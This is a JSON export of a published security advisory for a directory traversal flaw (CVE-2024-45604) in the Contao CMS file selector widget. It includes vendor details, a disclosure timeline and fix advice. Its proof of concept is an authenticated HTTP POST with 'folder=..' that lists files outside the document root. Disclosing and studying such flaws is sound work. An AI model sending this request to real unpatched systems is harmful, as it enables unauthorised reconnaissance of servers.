{"id":23423,"date":"2024-10-30T10:40:06","date_gmt":"2024-10-30T09:40:06","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=23423"},"modified":"2024-11-08T15:57:19","modified_gmt":"2024-11-08T14:57:19","slug":"usd-2024-0012","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2024-0012\/","title":{"rendered":"usd-2024-0012"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.2\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2024-0012 | Directory Traversal in Contao 4.12.7<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2024-0012
Product<\/strong>: Contao
Affected Version<\/strong>: < 4.13.49
Vulnerability Type<\/strong>: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)
Security Risk<\/strong>: Medium CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:L\/I:N\/A:N
Vendor URL<\/strong>: https:\/\/contao.org\/<\/a>
Vendor Acknowledged Vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: CVE-2024-45604
CVE Link<\/strong>: CVE-2024-45604<\/a><\/p>\n

Affected Component(s)<\/h3>\n

Contao File Selector Widget<\/p>\n

Desciption<\/h3>\n

Authenticated users in the backend can list files outside the document root in the file manager. However, it is not possible to read the contents of these files.<\/p>\n

Proof of Concept<\/h3>\n
\n
<\/span>POST<\/span> \/contao?do=files<\/span> HTTP<\/span>\/<\/span>2
<\/span>Host<\/span>:<\/span> localhost
<\/span>X-Requested-With<\/span>:<\/span> XMLHttpRequest
<\/span>X-Request<\/span>:<\/span> JSON
<\/span>Content-Type<\/span>:<\/span> application\/x-www-form-urlencoded; charset=utf-8
<\/span>Content-Length<\/span>:<\/span> 76<\/span><\/pre>\n
 <\/p>\n
action<\/span>=<\/span>loadFiletree<\/span>&<\/span>id<\/span>=<\/span>filetree_d1973b85<\/span>&<\/span>level<\/span>=<\/span>1<\/span>&<\/span>folder<\/span>=<\/span>..<\/span>&<\/span>state<\/span>=<\/span>1<\/span>&<\/span>name<\/span>=<\/span>name<\/span><\/p>\n<\/div>\n
<\/h3>\n
Fix<\/h3>\n
Assume all input is malicious. Use an \"accept known good\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.<\/p>\n
Users of Contao can upgrade to a patched version.<\/p>\n
References<\/h3>\n
https:\/\/cwe.mitre.org\/data\/definitions\/22.html<\/a>
https:\/\/github.com\/advisories\/GHSA-4p75-5p53-65m9<\/a><\/p>\n
Timeline<\/h3>\n
    \n
  • 2024-08-15:<\/strong> Vulnerability identified by Jakob Steeg.<\/li>\n
  • 2024-09-02:<\/strong> Sent first contact request.<\/li>\n
  • 2024-09-05:<\/strong> Contao reports that a fix is being worked on.<\/li>\n
  • 2024-09-07:<\/strong> Contao published a fix in version 4.13.49.<\/li>\n
  • 2024-10-30:<\/strong> This advisory is published.<\/li>\n<\/ul>\n
    Credits<\/h3>\n
    This security vulnerability was identified by Jakob Steeg of usd AG.<\/p>\n
    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"
    usd-2024-0012 | Directory Traversal in Contao 4.12.7 Advisory ID: usd-2024-0012Product: ContaoAffected Version: < 4.13.49Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)Security Risk: Medium CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:L\/I:N\/A:NVendor URL: https:\/\/contao.org\/Vendor Acknowledged Vulnerability: YesVendor Status: FixedCVE Number: CVE-2024-45604CVE Link: CVE-2024-45604 Affected Component(s) Contao File Selector Widget Desciption Authenticated users in the backend can list […]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-23423","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23423","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=23423"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23423\/revisions"}],"predecessor-version":[{"id":23614,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23423\/revisions\/23614"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=23423"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}